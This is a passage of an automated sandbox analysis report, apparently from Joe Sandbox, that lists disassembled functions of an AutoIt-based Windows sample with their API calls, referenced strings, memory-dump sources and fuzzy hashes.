Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 8f99d6ca9c69b4eab38b4f0991a67812861252529926be9c77aa26aaf1669e03
Instruction ID: 82dc210e93aeeea95dc6d6597d1f7ce33358a4c7af0322b5a719096688faf03f
Opcode Fuzzy Hash: 8f99d6ca9c69b4eab38b4f0991a67812861252529926be9c77aa26aaf1669e03
Instruction Fuzzy Hash: 07F05EB2254159BBE7215B669C0EEEF3E7CEFCAB11F00015AF601D1091D7A15A01E7B9

Function 00957439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00957452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00957469
GetWindowDC.USER32(?), ref: 00957475
GetPixel.GDI32(00000000,?,?), ref: 00957484
ReleaseDC.USER32(?,00000000), ref: 00957496
GetSysColor.USER32(00000005), ref: 009574B0

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: d2d0ccd70ffb550ef204af0c2cf66ff2742a46753c7b9e63d9059c9742d6b28b
Instruction ID: edf510d69a72bf5033b97e4c818cc988e71ce143c4e7643e0ec8b5851008c593
Opcode Fuzzy Hash: d2d0ccd70ffb550ef204af0c2cf66ff2742a46753c7b9e63d9059c9742d6b28b
Instruction Fuzzy Hash: 9F018B72418205FFDB109FA8EC08BAABBB6FB08312F510061FD16A20B0CB311E41AB21

Function 00961874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0096187F
UnloadUserProfile.USERENV(?,?), ref: 0096188B
CloseHandle.KERNEL32(?), ref: 00961894
CloseHandle.KERNEL32(?), ref: 0096189C
GetProcessHeap.KERNEL32(00000000,?), ref: 009618A5
HeapFree.KERNEL32(00000000), ref: 009618AC

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 3376eb3ba2ed236bd87bbb7c33565d4da7681e47619748804f99ad10ffc8d265
Instruction ID: e043ebe86c6bf60cf4449ed782942424930f74645690b89316995cf101afd462
Opcode Fuzzy Hash: 3376eb3ba2ed236bd87bbb7c33565d4da7681e47619748804f99ad10ffc8d265
Instruction Fuzzy Hash: 9EE0E5B601C101BBDB015FA9EE0D90ABF39FF49B22B108222F22581070CB329420EF64

Function 0096C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00907620: _wcslen.LIBCMT ref: 00907625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0096C6EE
_wcslen.LIBCMT ref: 0096C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0096C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0096C7CA

Strings

0, xrefs: 0096C6AF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 0141aa2b987d49d01fdbe6517e1e00063468743584ed1657b9f511dbb1b77264
Instruction ID: 6d98e9f76b093aed9581709fc5df69c25f9b8a0fd21ed7773046d047fbc0532a
Opcode Fuzzy Hash: 0141aa2b987d49d01fdbe6517e1e00063468743584ed1657b9f511dbb1b77264
Instruction Fuzzy Hash: B951F1B1608301ABD7109F28C885B7B77E8AF89314F040A2EF9E5E32E0DB74D844DB56

Function 0098AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0098AEA3

Part of subcall function 00907620: _wcslen.LIBCMT ref: 00907625

GetProcessId.KERNEL32(00000000), ref: 0098AF38
CloseHandle.KERNEL32(00000000), ref: 0098AF67

Strings

<, xrefs: 0098AE6B
@, xrefs: 0098AE72

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 78c066a626f27c1a242a4e7b43d6e8cfbaf775681032f241127ed398436952e8
Instruction ID: 25ffbd90e89e47b611e55f4226032d4a72b5020e599fdac32d2609d9b32646fe
Opcode Fuzzy Hash: 78c066a626f27c1a242a4e7b43d6e8cfbaf775681032f241127ed398436952e8
Instruction Fuzzy Hash: D5717C71A00619DFDB14EF94C884A9EBBF4FF48314F04849AE816AB392CB74ED45CB91

Function 0096719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00967206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0096723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0096724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009672CF

Strings

DllGetClassObject, xrefs: 00967242

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 3b665d859325503a802a2fdd9f86b191a3d33b74126fd1b6eb427622862399ae
Instruction ID: d942f1e44bdf5df43a2b30b61f36e96356c8d7a92fbe9c8321bb35822ac38983
Opcode Fuzzy Hash: 3b665d859325503a802a2fdd9f86b191a3d33b74126fd1b6eb427622862399ae
Instruction Fuzzy Hash: E64182B1A04204DFDB15CF94C894B9ABBB9EF44318F1480ADFD159F20AD7B0D944DBA0

Function 00993D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00993E35
IsMenu.USER32(?), ref: 00993E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00993E92
DrawMenuBar.USER32 ref: 00993EA5

Strings

0, xrefs: 00993D89

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: aa5f8b3be5c0b3af725755cadfc06bfd90d2d13fcb0118357e82e13aebcc8f73
Instruction ID: fc0a37903cb3c559edfd8d0ba43182646b3cc63fff6af81a636432ba52983da1
Opcode Fuzzy Hash: aa5f8b3be5c0b3af725755cadfc06bfd90d2d13fcb0118357e82e13aebcc8f73
Instruction Fuzzy Hash: B7413975A15209EFDF10DF98D884EAABBB9FF49354F048129F906A7250D730AE44DF50

Function 00961DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

Part of subcall function 00963CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00963CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00961E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00961E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00961EA9

Part of subcall function 00906B57: _wcslen.LIBCMT ref: 00906B6A

Strings

ComboBox, xrefs: 00961DF0
ListBox, xrefs: 00961E25

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 67af8e435396ad3d1a592766a55b1e7f406b4bd32a2d6d2a40282b24d9c3791c
Instruction ID: c234dd165cc1d0eb2a068b859ec3e4b9c0b7399e9b30ae36b55d39011e08d8f9
Opcode Fuzzy Hash: 67af8e435396ad3d1a592766a55b1e7f406b4bd32a2d6d2a40282b24d9c3791c
Instruction Fuzzy Hash: BB2138B2E00108BFDB15AB64DC45EFFBBBDDF85350B188519F825A71E1DB398D099620

Function 00992F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00992F8D
LoadLibraryW.KERNEL32(?), ref: 00992F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00992FA9
DestroyWindow.USER32(?), ref: 00992FB1

Strings

SysAnimate32, xrefs: 00992F68

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: ab7c9f239dec4f22fb0b593cc9e98b430e70c8b8c7ce5cef3b3bd06daba11cb8
Instruction ID: 4be674306d2ed21686430d4920df47576b95a30f62829455f19f6354589a9af0
Opcode Fuzzy Hash: ab7c9f239dec4f22fb0b593cc9e98b430e70c8b8c7ce5cef3b3bd06daba11cb8
Instruction Fuzzy Hash: 8621AC72204205BBEF108FA8DC80FBB77BDEB99364F100619F954D21A0D771DC91A760

Function 00924D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00924D1E,009328E9,?,00924CBE,009328E9,009C88B8,0000000C,00924E15,009328E9,00000002), ref: 00924D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00924DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00924D1E,009328E9,?,00924CBE,009328E9,009C88B8,0000000C,00924E15,009328E9,00000002,00000000), ref: 00924DC3

Strings

mscoree.dll, xrefs: 00924D86
CorExitProcess, xrefs: 00924D98

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 96d548db6cc0a29615c7d5793e461d564ee70d719a9aef4072b2f3a6fed8c0f4
Instruction ID: 6b7d47642dbe4fdecc17d21c7f54615bc20c7b9b25d85ea5ddc21951458e7414
Opcode Fuzzy Hash: 96d548db6cc0a29615c7d5793e461d564ee70d719a9aef4072b2f3a6fed8c0f4
Instruction Fuzzy Hash: A8F06274A54218BBDB119F94EC49BADBFB9EF84752F4001A5F909A62A0CB306D40DBD4

Function 00904E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00904EDD,?,009D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00904E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00904EAE
FreeLibrary.KERNEL32(00000000,?,?,00904EDD,?,009D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00904EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00904EA8
kernel32.dll, xrefs: 00904E94

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 452de37b447cb379002f7771190565a2fec5e97334eb815f25516cbc24dd0425
Instruction ID: 1d9d1f5caeeb079c93e4753d04b62b5d8df650131131a59eb2c2792994b87221
Opcode Fuzzy Hash: 452de37b447cb379002f7771190565a2fec5e97334eb815f25516cbc24dd0425
Instruction Fuzzy Hash: 0DE08CB6A1A6225FD3321B29BC18B6B6658AFC1B67B050116FE04E2290DB60CD0290E9

Function 00904E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00943CDE,?,009D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00904E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00904E74
FreeLibrary.KERNEL32(00000000,?,?,00943CDE,?,009D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00904E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00904E6E
kernel32.dll, xrefs: 00904E5B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: eb560318f3c3be2c2b9307408eb58f7889fc0e1d92ec319c97143efbae2ce109
Instruction ID: 438443c43fd036f1d89b3f06016b143ee65ab0d8911bab2cb4047955d54bdfeb
Opcode Fuzzy Hash: eb560318f3c3be2c2b9307408eb58f7889fc0e1d92ec319c97143efbae2ce109
Instruction Fuzzy Hash: 6CD0C2B291A6215B8A321B28BC08E8B2A1CAF81B16305411ABA08A2190CF20CD01D1D5

Function 0098A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0098A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0098A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0098A468
CloseHandle.KERNEL32(?), ref: 0098A63D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 40581f2d93f1e9de8013723f14384d437d969725c12581955799900daa01a7d4
Instruction ID: 57cceb0a4fa96feea88d036449b215941b350dbbc7ebbbf9bfa69a2a75152eba
Opcode Fuzzy Hash: 40581f2d93f1e9de8013723f14384d437d969725c12581955799900daa01a7d4
Instruction Fuzzy Hash: DFA194B16043019FE720EF28C886F2AB7E5AF84714F14895DF5599B3D2DBB1EC418B92

Function 0093BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,009A3700), ref: 0093BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,009D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0093BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,009D1270,000000FF,?,0000003F,00000000,?), ref: 0093BC36
_free.LIBCMT ref: 0093BB7F

Part of subcall function 009329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000), ref: 009329DE
Part of subcall function 009329C8: GetLastError.KERNEL32(00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000,00000000), ref: 009329F0

_free.LIBCMT ref: 0093BD4B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 5cf8498f8c623f5ee4f032e1e9cb03b4856dcb2ad7fa6a47912af45248c5b1cd
Instruction ID: 31eb7263e3b5a4027a154f4b370fd3f352d2d92143729942552040e3a949614a
Opcode Fuzzy Hash: 5cf8498f8c623f5ee4f032e1e9cb03b4856dcb2ad7fa6a47912af45248c5b1cd
Instruction Fuzzy Hash: B551C972904219EFCB24EF699C81A6EB7BCEF81350F10426BE664D7291EB315E41DF50

Function 0096E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0096CF22,?), ref: 0096DDFD

Part of subcall function 0096DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0096CF22,?), ref: 0096DE16

Part of subcall function 0096E199: GetFileAttributesW.KERNEL32(?,0096CF95), ref: 0096E19A

lstrcmpiW.KERNEL32(?,?), ref: 0096E473
MoveFileW.KERNEL32(?,?), ref: 0096E4AC
_wcslen.LIBCMT ref: 0096E5EB
_wcslen.LIBCMT ref: 0096E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0096E650

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 66eb277d94e475c81e3186242b16432772f4eba7d1fa67bd55ab0f40f76e91c9
Instruction ID: 7774609c93ce920491b33ef56c9cda4c96005e9521fd5e9fefbd4c8fe0c406ad
Opcode Fuzzy Hash: 66eb277d94e475c81e3186242b16432772f4eba7d1fa67bd55ab0f40f76e91c9
Instruction Fuzzy Hash: 2F5151B65083859BC724EBA4DC91ADB73ECAFC5340F00491EF689D3191EF74A6888766

Function 0098B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

Part of subcall function 0098C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0098B6AE,?,?), ref: 0098C9B5
Part of subcall function 0098C998: _wcslen.LIBCMT ref: 0098C9F1
Part of subcall function 0098C998: _wcslen.LIBCMT ref: 0098CA68
Part of subcall function 0098C998: _wcslen.LIBCMT ref: 0098CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0098BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0098BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0098BB63
RegCloseKey.ADVAPI32(?,?), ref: 0098BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0098BBB3

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: e7eebe6b6120840f2d0af31b6fd6054a5825b936c6dc60c15b44e594a05e1517
Instruction ID: 457e4be173bb06c6dfe959093348ecd84cb5727e9617a50214d4ca7262ce8502
Opcode Fuzzy Hash: e7eebe6b6120840f2d0af31b6fd6054a5825b936c6dc60c15b44e594a05e1517
Instruction Fuzzy Hash: F2616F71208241AFD714EF14C891E2ABBE9FF84348F58895DF4994B3A2DB31ED45CB92

Function 00968BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00968BCD
VariantClear.OLEAUT32 ref: 00968C3E
VariantClear.OLEAUT32 ref: 00968C9D
VariantClear.OLEAUT32(?), ref: 00968D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00968D3B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

